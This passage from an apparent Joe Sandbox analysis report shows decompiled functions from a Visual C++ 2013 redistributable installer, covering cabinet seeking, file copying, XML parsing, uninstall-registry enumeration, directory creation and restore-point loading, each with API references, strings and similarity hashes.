				_t46 = _a12;
				if(_t46 == 0) {
					asm("cdq");
					_t85 = _a8.LowPart +  *((intOrPtr*)(_t69 + 8));
					_t81 = __edx;
					asm("adc edi, [ebx+0xc]");
					L7:
					_t49 = E012A5A83(_t69 + 0x1c, _a4);
					if(_t49 == 0) {
						L18:
						_v16 = _v16 -  *((intOrPtr*)(_t69 + 8));
						asm("sbb eax, [ebx+0xc]");
						L19:
						_t52 = _v8;
						 *(_t69 + 0x30) = _t52;
						if(_t52 >= 0) {
							return _v16;
						} else {
							return _t52 | 0xffffffff;
						}
					}
					_t73 = _a12;
					if(_t73 == 0) {
						 *(_t49 + 8) = _t85;
						 *(_t49 + 0xc) = _t81;
					} else {
						if(_t73 == 1) {
							 *(_t49 + 8) =  *(_t49 + 8) + _t85;
							asm("adc [eax+0xc], edi");
						}
					}
					_push(_a12);
					_v16 =  *(_t49 + 8);
					_v12 =  *(_t49 + 0xc);
					_t57 = SetFilePointerEx(_a4, _t85, _t81,  &_v16); // executed
					if(_t57 != 0) {
						goto L18;
					} else {
						_t58 = GetLastError();
						if(_t58 > 0) {
							_t58 = _t58 & 0x0000ffff | 0x80070000;
						}
						_v8 = _t58;
						if(_t58 >= 0) {
							_v8 = 0x80004005;
						}
						E012B294E(_t58, "cabextract.cpp", 0x324, _v8);
						E012AFA86(_v8, "Failed to move file pointer 0x%x bytes.", _a8.LowPart);
						goto L19;
					}
				}
				_t62 = _t46 - 1;
				if(_t62 == 0) {
					asm("cdq");
					_t85 = _a8.LowPart;
					_t81 = __edx;
					goto L7;
				}
				if(_t62 == 1) {
					_t81 =  *(_t69 + 0x14);
					asm("adc edi, [ebx+0xc]");
					asm("cdq");
					_t85 =  *((intOrPtr*)(_t69 + 0x10)) +  *((intOrPtr*)(_t69 + 8)) + _a8;
					asm("adc edi, edx");
					goto L7;
				} else {
					_push("Invalid seek type.");
					_push(0x80070057);
					_v8 = 0x80070057;
					E012AFA86();
					goto L19;
				}
			}

0x012a5fbe
0x012a5fcd
0x012a5fd2
0x012a5fdf
0x012a5fe0
0x012a5fe4
0x012a5fe7
0x012a602c
0x012a602f
0x012a6032
0x012a6034
0x012a6037
0x012a603d
0x012a6044
0x012a60ce
0x012a60d1
0x012a60d7
0x012a60da
0x012a60da
0x012a60df
0x012a60e5
0x012a60f0
0x012a60e7
0x012a60eb
0x012a60eb
0x012a60e5
0x012a604d
0x012a6050
0x012a605d
0x012a6060
0x012a6052
0x012a6053
0x012a6055
0x012a6058
0x012a6058
0x012a6053
0x012a6066
0x012a6069
0x012a606f
0x012a607b
0x012a6083
0x00000000
0x012a6085
0x012a6085
0x012a608d
0x012a6094
0x012a6094
0x012a6099
0x012a609e
0x012a60a0
0x012a60a0
0x012a60b4
0x012a60c4
0x00000000
0x012a60c9
0x012a6083
0x012a5fe9
0x012a5fea
0x012a6022
0x012a6023
0x012a6025
0x00000000
0x012a6025
0x012a5fed
0x012a6012
0x012a6015
0x012a6018
0x012a6019
0x012a601b
0x00000000
0x012a5fef
0x012a5ff4
0x012a5ff9
0x012a5ffa
0x012a5ffd
0x00000000
0x012a6003

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,?), ref: 012A607B
GetLastError.KERNEL32 ref: 012A6085

Strings

cabextract.cpp, xrefs: 012A60AF
Failed to move file pointer 0x%x bytes., xrefs: 012A60BC
Invalid seek type., xrefs: 012A5FF4

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
API String ID: 2976181284-417918914
Opcode ID: 8139ffca9c163238e682441e309f62b1e35c7993ce7d3331718e73d83e3ff2b1
Instruction ID: 9010936a3667fd4454f86bf6775f28785670f21f3ffee879a895056075f6dd20
Opcode Fuzzy Hash: 8139ffca9c163238e682441e309f62b1e35c7993ce7d3331718e73d83e3ff2b1
Instruction Fuzzy Hash: 5341A27196020AEFCB11CFA8C884A99BBF5FF04364F59C1A9E918EB251D775E940CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012B593D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B593D(WCHAR* _a4, WCHAR* _a8, int _a12) {
				int _t11;
				signed int _t13;
				signed int _t15;
				short _t18;
				signed int _t20;
				WCHAR* _t23;
				WCHAR* _t24;
				signed int _t25;
				WCHAR* _t27;

				_t23 = _a8;
				_t27 = 0;
				_t25 = 0;
				_t11 = CopyFileW(_a4, _t23, 0 | _a12 == 0x00000000); // executed
				if(_t11 != 0) {
					L21:
					return _t25;
				}
				_t13 = GetLastError();
				if(_a12 != 0 || _t13 != 0x50 && _t13 != 0xb7) {
					if(_t13 != 3) {
						if(_t13 > _t27) {
							_t13 = _t13 & 0x0000ffff | 0x80070000;
						}
						_t25 = _t13;
						goto L21;
					}
					_t15 =  *_t23 & 0x0000ffff;
					_t24 = _t23;
					if(_t15 == 0) {
						L17:
						_t25 = 0x80070003;
						goto L21;
					} else {
						goto L7;
					}
					do {
						L7:
						if(_t15 == 0x5c) {
							_t27 = _t24;
						}
						_t24 =  &(_t24[1]);
						_t15 =  *_t24 & 0x0000ffff;
					} while (_t15 != 0);
					if(_t27 == 0) {
						goto L17;
					}
					 *_t27 = 0;
					_t25 = E012B65D3(_t23, 0);
					_t18 = 0x5c;
					 *_t27 = _t18;
					if(_t25 >= 0 && CopyFileW(_a4, _t23, _a12) == 0) {
						_t20 = GetLastError();
						if(_t20 > 0) {
							_t20 = _t20 & 0x0000ffff | 0x80070000;
						}
						_t25 = _t20;
						if(_t25 < 0) {
							E012B294E(_t20, "fileutil.cpp", 0x3b1, _t25);
						}
					}
				} else {
					_t25 = 1;
				}
			}

0x012b5941
0x012b5948
0x012b594a
0x012b5957
0x012b595f
0x012b5a16
0x012b5a1c
0x012b5a1c
0x012b5965
0x012b596e
0x012b5987
0x012b5a08
0x012b5a0f
0x012b5a0f
0x012b5a14
0x00000000
0x012b5a14
0x012b5989
0x012b598c
0x012b5991
0x012b59ff
0x012b59ff
0x00000000
0x00000000
0x00000000
0x00000000
0x012b5993
0x012b5993
0x012b5997
0x012b5999
0x012b5999
0x012b599b
0x012b599e
0x012b59a1
0x012b59a8
0x00000000
0x00000000
0x012b59ae
0x012b59b6
0x012b59ba
0x012b59bb
0x012b59c0
0x012b59d3
0x012b59db
0x012b59e2
0x012b59e2
0x012b59e7
0x012b59eb
0x012b59f8
0x012b59f8
0x012b59eb
0x012b597c
0x012b597e
0x012b597e

APIs

CopyFileW.KERNELBASE(00000000,00000000,00000000,?,?,00000000,?,012B5A4A,00000000,00000000,?,?,?,01297736,00000000,?), ref: 012B5957
GetLastError.KERNEL32(?,012B5A4A,00000000,00000000,?,?,?,01297736,00000000,?,00000001,00000003,000007D0,?,?,01299676), ref: 012B5965
CopyFileW.KERNEL32(00000000,00000000,?,00000000,00000000,?,012B5A4A,00000000,00000000,?,?,?,01297736,00000000,?,00000001), ref: 012B59C9
GetLastError.KERNEL32(?,012B5A4A,00000000,00000000,?,?,?,01297736,00000000,?,00000001,00000003,000007D0,?,?,01299676), ref: 012B59D3

Strings

fileutil.cpp, xrefs: 012B59F3

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CopyErrorFileLast
String ID: fileutil.cpp
API String ID: 374144340-2967768451
Opcode ID: 6f514422b38619552dc7b0cd247a1cc332e861e6f822b4029ecc19e0b23a3762
Instruction ID: 35c985014528a75d4b2ef9e3911019d4b7b158f019279f70db53667fef735b84
Opcode Fuzzy Hash: 6f514422b38619552dc7b0cd247a1cc332e861e6f822b4029ecc19e0b23a3762
Instruction Fuzzy Hash: AE21C6366707179BDF315F699CC4BBA3A59EF82BF0B540439FA48EF140D668C85283A1

Uniqueness

Uniqueness Score: -1.00%

Function 012B540B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E012B540B(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v20;
				char _v28;
				intOrPtr* _t23;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;
				signed int _t33;
				void* _t35;
				void* _t37;
				void* _t44;

				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t37 = 0;
				__imp__#8( &_v28);
				_t23 = _a4;
				_t24 =  *((intOrPtr*)( *_t23 + 0x44))(_t23,  &_v8);
				_t44 = _t24;
				if(_t44 < 0) {
					L9:
					_t25 = _v8;
					if(_t25 != 0) {
						 *((intOrPtr*)( *_t25 + 8))(_t25);
					}
					_t26 = _v12;
					if(_t26 != 0) {
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
					__imp__#9( &_v28);
					if(_t37 != 0) {
						__imp__#6(_t37);
					}
					return _t44;
				}
				__imp__#2(_a8);
				_t37 = _t24;
				if(_t37 != 0) {
					_t44 = E012B4F42( &_v12, _v8, _t37,  &_v12);
					if(_t44 == 1) {
						L6:
						_t44 = 0x80070490;
						goto L9;
					}
					if(_t44 < 0) {
						goto L9;
					}
					_t33 = _v12;
					_t41 =  *_t33;
					_t44 =  *((intOrPtr*)( *_t33 + 0x20))(_t33,  &_v28);
					if(_t44 != 1) {
						if(_t44 >= 0) {
							_t35 = E012B1171(_t41,  &_v28, _a12, _v20, 0); // executed
							_t44 = _t35;
						}
						goto L9;
					}
					goto L6;
				}
				_t44 = 0x8007000e;
				E012B294E(_t24, "xmlutil.cpp", 0x2ae, 0x8007000e);
				goto L9;
			}

0x012b5411
0x012b5415
0x012b541f
0x012b5421
0x012b5427
0x012b5431
0x012b5434
0x012b5438
0x012b54a6
0x012b54a6
0x012b54ab
0x012b54b0
0x012b54b0
0x012b54b3
0x012b54b8
0x012b54bd
0x012b54bd
0x012b54c4
0x012b54cc
0x012b54cf
0x012b54cf
0x012b54da
0x012b54da
0x012b543d
0x012b5443
0x012b5447
0x012b546d
0x012b5472
0x012b548c
0x012b548c
0x00000000
0x012b548c
0x012b5476
0x00000000
0x00000000
0x012b5478
0x012b547b
0x012b5485
0x012b548a
0x012b5495
0x012b549f
0x012b54a4
0x012b54a4
0x00000000
0x012b5495
0x00000000
0x012b548a
0x012b5449
0x012b5459
0x00000000

APIs

VariantInit.OLEAUT32(?), ref: 012B5421
SysAllocString.OLEAUT32(?), ref: 012B543D
VariantClear.OLEAUT32(?), ref: 012B54C4
SysFreeString.OLEAUT32(00000000), ref: 012B54CF

Strings

xmlutil.cpp, xrefs: 012B5454

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: xmlutil.cpp
API String ID: 760788290-1270936966
Opcode ID: fb68a93b420cacd86697883f031da13eda4e10a5c435b28432541e11d2df2357
Instruction ID: 9473d5455aa0dd25a29d3942795c7312d5bc69089a564eb34094c2016eb13704
Opcode Fuzzy Hash: fb68a93b420cacd86697883f031da13eda4e10a5c435b28432541e11d2df2357
Instruction Fuzzy Hash: 02217F71E1121AAFDB109FA4C8C8EEE7BB8EF447A6F144464FA01EB250D678DD018B90

Uniqueness

Uniqueness Score: -1.00%

Function 012A0D9A Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 79
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E012A0D9A(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short* _v8;
				void* _v12;
				short* _v16;
				void* __ebx;
				void* __esi;
				void* _t28;
				void* _t33;
				int _t37;
				void* _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t45;

				_t42 = __edx;
				_t37 = 0;
				_v12 = 0;
				_v8 = 0;
				_t28 = E012B378B((0 | _a4 != 0x00000000) + 0x80000001, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0x20019,  &_v12); // executed
				_t44 = _t28;
				if(_t44 == 0x80070003 || _t44 == 0x80070002) {
					L12:
					_t45 = 0;
				} else {
					if(_t44 >= 0) {
						_t43 = _a8;
						_v16 = 0;
						while(1) {
							_t33 = E012B37F2(_t39, _v12, _v16,  &_v8); // executed
							_t45 = _t33;
							if(_t45 == 0x80070103) {
								goto L12;
							}
							if(_t45 < _t37) {
								_push("Failed to enumerate uninstall key for related bundles.");
								goto L11;
							} else {
								if(CompareStringW(_t37, 1, _v8, 0xffffffff,  *(_t43 + 0x10), 0xffffffff) != 2) {
									E012A0CDA(_v8, _t39, _t42, _a12, _a4, _v12, _t43); // executed
									_t37 = 0;
								}
								_v16 = _v16 + 1;
								continue;
							}
							goto L13;
						}
						goto L12;
					} else {
						_push("Failed to open uninstall registry key.");
						L11:
						_push(_t45);
						E012AFA86();
					}
				}
				L13:
				if(_v8 != _t37) {
					E012B01E8(_v8);
				}
				if(_v12 != _t37) {
					RegCloseKey(_v12);
				}
				return _t45;
			}

0x012a0d9a
0x012a0da7
0x012a0dbb
0x012a0dbe
0x012a0dc7
0x012a0dcc
0x012a0dd4
0x012a0e4c
0x012a0e4c
0x012a0dde
0x012a0de0
0x012a0de9
0x012a0dec
0x012a0def
0x012a0df9
0x012a0dfe
0x012a0e06
0x00000000
0x00000000
0x012a0e0a
0x012a0e3d
0x00000000
0x012a0e0c
0x012a0e22
0x012a0e31
0x012a0e36
0x012a0e36
0x012a0e38
0x00000000
0x012a0e38
0x00000000
0x012a0e0a
0x00000000
0x012a0de2
0x012a0de2
0x012a0e42
0x012a0e42
0x012a0e43
0x012a0e49
0x012a0de0
0x012a0e4e
0x012a0e51
0x012a0e56
0x012a0e56
0x012a0e5e
0x012a0e63
0x012a0e63
0x012a0e6f

APIs

Part of subcall function 012B378B: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,01291F19,?,00000009,00000000,?,01291BE1,80000002,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,?,00000001), ref: 012B379F

CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,?,?,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?,?,00000000), ref: 012A0E19
RegCloseKey.ADVAPI32(?,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?,?,00000000,?,?,?,?,00000001,00000000), ref: 012A0E63

Strings

Failed to enumerate uninstall key for related bundles., xrefs: 012A0E3D
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 012A0DB6
Failed to open uninstall registry key., xrefs: 012A0DE2

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseCompareOpenString
String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 2817536665-2531018330
Opcode ID: 2fa34a34db4aab11e52584329d5ede11fdefef9b626d0cb659febfdf3aff8b7c
Instruction ID: 9f8a134346f71e504390d47ca77bf86154606e52fe0e1180993268adc50eeb37
Opcode Fuzzy Hash: 2fa34a34db4aab11e52584329d5ede11fdefef9b626d0cb659febfdf3aff8b7c
Instruction Fuzzy Hash: EC21B33AD2021AFBCF21AED8CDC59EDBB79AB04350F544669FB1173150C2765A80AB84

Uniqueness

Uniqueness Score: -1.00%

Function 012B65D3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B65D3(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8) {
				int _t5;
				long _t7;
				signed int _t8;
				short _t12;
				signed int _t14;
				WCHAR* _t17;
				WCHAR* _t18;
				signed int _t19;
				WCHAR* _t22;

				_t17 = _a4;
				_t19 = 0;
				_t5 = CreateDirectoryW(_t17, _a8); // executed
				if(_t5 != 0) {
					L19:
					return _t19;
				}
				_t7 = GetLastError();
				if(_t7 == 0xb7 || _t7 != 3 && E012B65A8(_t17, 0) != 0) {
					goto L19;
				} else {
					_t8 =  *_t17 & 0x0000ffff;
					_t22 = 0;
					_t18 = _t17;
					if(_t8 == 0) {
						L9:
						_t19 = 0x80070003;
						E012B294E(_t8, "dirutil.cpp", 0x7a, 0x80070003);
						L18:
						goto L19;
					} else {
						goto L5;
					}
					do {
						L5:
						if(_t8 == 0x5c) {
							_t22 = _t18;
						}
						_t18 =  &(_t18[1]);
						_t8 =  *_t18 & 0x0000ffff;
					} while (_t8 != 0);
					if(_t22 != 0) {
						 *_t22 = 0;
						_t19 = E012B65D3(_t17, _a8);
						_t12 = 0x5c;
						 *_t22 = _t12;
						if(_t19 >= 0) {
							if(CreateDirectoryW(_t17, _a8) != 0) {
								_t19 = 0;
							} else {
								_t14 = GetLastError();
								if(_t14 != 0xb7) {
									if(_t14 > 0) {
										_t14 = _t14 & 0x0000ffff | 0x80070000;
									}
									_t19 = _t14;
								} else {
									_t19 = 1;
								}
							}
						}
						goto L18;
					}
					goto L9;
				}
			}

0x012b65d7
0x012b65de
0x012b65e1
0x012b65e9
0x012b669b
0x012b66a0
0x012b66a0
0x012b65ef
0x012b65fa
0x00000000
0x012b6614
0x012b6614
0x012b6618
0x012b661a
0x012b661f
0x012b6638
0x012b6638
0x012b6645
0x012b669a
0x00000000
0x00000000
0x00000000
0x00000000
0x012b6621
0x012b6621
0x012b6625
0x012b6627
0x012b6627
0x012b6629
0x012b662c
0x012b662f
0x012b6636
0x012b6652
0x012b665a
0x012b665e
0x012b665f
0x012b6664
0x012b6672
0x012b6698
0x012b6674
0x012b6674
0x012b667f
0x012b6688
0x012b668f
0x012b668f
0x012b6694
0x012b6681
0x012b6683
0x012b6683
0x012b667f
0x012b6672
0x00000000
0x012b6664
0x00000000
0x012b6636

APIs

CreateDirectoryW.KERNELBASE(00000003,00000001,00000000,00000001,?,012B5AFC,00000001,00000000,?,?,?,012B5B97,00000003,00000001,00000001,00000000), ref: 012B65E1
GetLastError.KERNEL32(?,012B5AFC,00000001,00000000,?,?,?,012B5B97,00000003,00000001,00000001,00000000,00000000,00000000,?,01297625), ref: 012B65EF

Part of subcall function 012B65A8: GetFileAttributesW.KERNEL32(00000003,00000000,?,012B660C,00000003,00000000,?,012B5AFC,00000001,00000000,?,?,?,012B5B97,00000003,00000001), ref: 012B65B1

Part of subcall function 012B65D3: CreateDirectoryW.KERNEL32(00000003,00000001,00000000,?,012B5AFC,00000001,00000000,?,?,?,012B5B97,00000003,00000001,00000001,00000000,00000000), ref: 012B666A
Part of subcall function 012B65D3: GetLastError.KERNEL32(?,012B5AFC,00000001,00000000,?,?,?,012B5B97,00000003,00000001,00000001,00000000,00000000,00000000,?,01297625), ref: 012B6674

Strings

dirutil.cpp, xrefs: 012B6640

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CreateDirectoryErrorLast$AttributesFile
String ID: dirutil.cpp
API String ID: 925696554-2193988115
Opcode ID: 66c93c43894717a94a0296db80dc7a0412a9bb681404551fd17d7ba3c4034e25
Instruction ID: 68522be9f0dfd4ff47cb9daa8a456b805ea58bea5b7cda94381f4693971609a0
Opcode Fuzzy Hash: 66c93c43894717a94a0296db80dc7a0412a9bb681404551fd17d7ba3c4034e25
Instruction Fuzzy Hash: 2411E636130213AEDB351A6AACC8BFB3A99EFD97E1B140429FF45CA180DA7DD4018760

Uniqueness

Uniqueness Score: -1.00%

Function 012A05CB Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E012A05CB(void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				char _v24;
				char _v64;
				char _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				void* _t25;
				void* _t35;
				void* _t38;

				_t35 = __edx;
				E012A7E30( &_v88, 0, 0x50);
				_t29 = _a4;
				_v8 = 0;
				_v84 = 1;
				_v80 = 1;
				_v76 = 1;
				_v72 = 0;
				if(E01281FC6( &_v24, _a4, 0, 1,  &_v24,  &_v64,  &_v16) >= 0) {
					_t38 = E012B1A74( &_v8, 0);
					if(_t38 >= 0) {
						_t25 = E012A0431(_t35, _a8,  &_v88,  *_t29, _v8); // executed
						_t38 = _t25;
						if(_t38 < 0) {
							_push("Failed to open attached container.");
							goto L6;
						}
					} else {
						_push("Failed to get path for executing module.");
						goto L6;
					}
				} else {
					_push("Failed to get container information for UX container.");
					L6:
					_push(_t38);
					E012AFA86();
				}
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				return _t38;
			}

0x012a05cb
0x012a05dd
0x012a05e2
0x012a05fa
0x012a05fd
0x012a0600
0x012a0603
0x012a0606
0x012a0612
0x012a0625
0x012a0629
0x012a063e
0x012a0643
0x012a0647
0x012a0649
0x00000000
0x012a0649
0x012a062b
0x012a062b
0x00000000
0x012a062b
0x012a0614
0x012a0614
0x012a064e
0x012a064e
0x012a064f
0x012a0655
0x012a0659
0x012a065e
0x012a065e
0x012a0669

APIs

_memset.LIBCMT ref: 012A05DD

Strings

Failed to get container information for UX container., xrefs: 012A0614
Failed to open attached container., xrefs: 012A0649
Failed to get path for executing module., xrefs: 012A062B
WixBundleElevated, xrefs: 012A05D1

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: _memset
String ID: Failed to get container information for UX container.$Failed to get path for executing module.$Failed to open attached container.$WixBundleElevated
API String ID: 2102423945-2733515141
Opcode ID: 697d57038dae9659d17675739815e41bbd30d120a88017ae20e744462caaf390
Instruction ID: 99ceb9472f728306ba3fd608254a4396ddc2a8a350af304a498870444fc884be
Opcode Fuzzy Hash: 697d57038dae9659d17675739815e41bbd30d120a88017ae20e744462caaf390
Instruction Fuzzy Hash: 5E1190B2C20119BFCB11EBE4DD41CFEBBBCAA94B54B60422AF615A7100E6705E05C798

Uniqueness

Uniqueness Score: -1.00%

Function 012B2FFF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B2FFF(void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _t2;
				_Unknown_base(*)()* _t3;
				signed int _t6;
				signed int _t7;
				void* _t10;
				signed int _t11;

				_t10 = __edx;
				_t2 = E012B2A2D(L"srclient.dll", 0x12d5de0); // executed
				_t11 = _t2;
				if(_t11 >= 0) {
					_t3 = GetProcAddress( *0x12d5de0, "SRSetRestorePointW");
					 *0x12d5ddc = _t3;
					if(_t3 != 0) {
						if(_a4 != 0) {
							_t6 = E012B2B14(_t10); // executed
							_t11 = _t6;
						}
					} else {
						_t7 = GetLastError();
						if(_t7 > 0) {
							_t7 = _t7 & 0x0000ffff | 0x80070000;
						}
						_t11 = _t7;
						if(_t11 >= 0) {
							_t11 = 0x80004005;
						}
						E012B294E(_t7, "srputil.cpp", 0x27, _t11);
					}
					if(_t11 >= 0) {
						goto L13;
					} else {
						goto L11;
					}
				} else {
					_t11 = 0x80004001;
					L11:
					if( *0x12d5de0 != 0) {
						E012B2AF5();
					}
					L13:
					return _t11;
				}
			}

0x012b2fff
0x012b300d
0x012b3012
0x012b3016
0x012b302a
0x012b3030
0x012b3037
0x012b306b
0x012b306d
0x012b3072
0x012b3072
0x012b3039
0x012b3039
0x012b3041
0x012b3048
0x012b3048
0x012b304d
0x012b3051
0x012b3053
0x012b3053
0x012b3060
0x012b3060
0x012b3076
0x00000000
0x00000000
0x00000000
0x00000000
0x012b3018
0x012b3018
0x012b3078
0x012b307f
0x012b3081
0x012b3081
0x012b3086
0x012b308a
0x012b308a

APIs

Part of subcall function 012B2A2D: _memset.LIBCMT ref: 012B2A54
Part of subcall function 012B2A2D: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 012B2A69
Part of subcall function 012B2A2D: LoadLibraryW.KERNELBASE(?,?,00000104,01281C3B), ref: 012B2AB7
Part of subcall function 012B2A2D: GetLastError.KERNEL32 ref: 012B2AC3

GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 012B302A
GetLastError.KERNEL32(?,012816AF,00000001,00000000,?,?,?,?,01281DEA,?,?), ref: 012B3039

Strings

srputil.cpp, xrefs: 012B305B
srclient.dll, xrefs: 012B3008
SRSetRestorePointW, xrefs: 012B301F

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$AddressDirectoryLibraryLoadProcSystem_memset
String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
API String ID: 2131201312-398595594
Opcode ID: f756ac447164a7afcd5deb2c8beacaa5d82605432dbdf24266e5922d3b3af52c
Instruction ID: e0882277f44e5217d119255572bf7c5d55e9909bec147fcf37874741d4f09d7f
Opcode Fuzzy Hash: f756ac447164a7afcd5deb2c8beacaa5d82605432dbdf24266e5922d3b3af52c
Instruction Fuzzy Hash: 7901F932AF4723E7D3329659E88D7E939546F007E1F050669AF04EB210DAA5E840C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 012810DC Relevance: 7.6, APIs: 5, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012810DC(void* __ebx, void* __ecx, struct _CRITICAL_SECTION* __esi) {
				void* __edi;
				void* _t31;
				long _t57;
				void* _t69;
				void* _t70;
				struct _CRITICAL_SECTION* _t74;

				_t74 = __esi;
				_t70 = __ecx;
				_t69 = __ebx;
				_t25 =  *((intOrPtr*)(__esi + 0x4cc));
				if( *((intOrPtr*)(__esi + 0x4cc)) != 0) {
					E012B01E8(_t25);
				}
				E01282872(_t74 + 0x4ac);
				E01282872(_t74 + 0x494);
				_t30 =  *((intOrPtr*)(_t74 + 0x490));
